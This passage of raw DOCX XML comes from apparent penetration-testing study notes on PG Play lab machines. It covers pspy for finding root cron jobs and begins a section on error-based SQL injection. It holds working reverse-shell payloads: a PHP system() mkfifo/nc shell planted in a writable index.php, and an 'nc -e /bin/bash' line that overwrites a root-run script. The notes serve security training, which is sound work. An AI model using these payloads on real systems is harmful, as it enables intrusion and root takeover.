        <w:t xml:space="preserve">We go inspect </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/tmp/sv</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and we see that index.php is writable, which means we can add a reverse shell to index.php, trigger it by curling 127.0.0.1:57, and then getting reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000165E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1222"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nano into index.php, and replace it with this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000165F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001660">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2&gt;&amp;1|nc 192.168.49.56 9001 &gt; /tmp/f");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001661">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">?&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001662">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016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64">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001665">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001666">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_khop5jxnjbfh" w:id="185"/>
      <w:bookmarkEnd w:id="185"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pspy </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001667">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Why use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pspy </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and not</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ps aux</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001668">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Doesn’t require root — uses /proc to watch for new processes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001669">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ps aux</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> skips a lot of information without root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000166A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Can reveal scheduled tasks, cron jobs, timers, and background scripts you’d miss with ps.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000166B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Great for privilege escalation — can catch scripts run by root that you might be able to modify or abuse.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000166C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It is continuously running while </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ps aux</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is just a static screenshot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000166D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000166E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000166F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Also used in the Relia Challenge Lab for .19 machine along with the Borg binary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001670">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId440">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">GlasgowSmile</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, they used pspy to see if there were any cron jobs or scripts running that looked suspicious. You can use either pspy64 or pspy32</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001671">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001672">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./pspy64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001673">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001674">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1181100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="318" name="image321.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image321.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId44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675">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1260"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">There is this script running with root privileges as UID=0 every one minute, this means any security checks are bypassed for them</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001676">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001677">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/sh -c /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is a shell script that executes the contents of the file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/home/penguin/SomeoneWhoHidesBehindAMask/.trash_old</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. The -c flag tells the sh shell to interpret the following argument as a command to execute.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001678">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001679">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, we overwrite the script, to hopefully get us a reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000167A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="404"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo 'nc -e /bin/bash 192.168.45.160 6666' &gt; .trash_old</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000167B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000167C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now wait for 1 minute and go to your listener netcat shell where you should have root!!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000167D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000167E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">—---------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000167F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001680">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001681">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SunsetDecoy </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play seemed to have many different ways to get privilege escalation. In </w:t>
      </w:r>
      <w:hyperlink r:id="rId442">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">this</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> version of the walkthrough, they used the antivirus scan capability. And then in </w:t>
      </w:r>
      <w:hyperlink r:id="rId443">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">this</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> version of the walkthrough, they used CHKROOTKIT. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001682">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1266"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But one thing they both had in common is that they both used </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pspy64</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, a tool that monitors processes running on the system without requiring root access. It shows scheduled tasks, cron jobs, and processes triggered by system activity.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001683">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000168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85">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_nh9m1fnbezlt" w:id="186"/>
      <w:bookmarkEnd w:id="186"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Identifying SQLi via Error-based Payloads (for mysql)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001686">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001687">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XXXXXXXXX 10.2.1. Identifying SQLi via Error-based Payloads</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001688">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001689">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this example, they use</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> mysql</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000168A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000168B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can try using characters like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">in the username field, and if you get an error on the webpage, then you likely have SQL injection </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000168C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="711"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
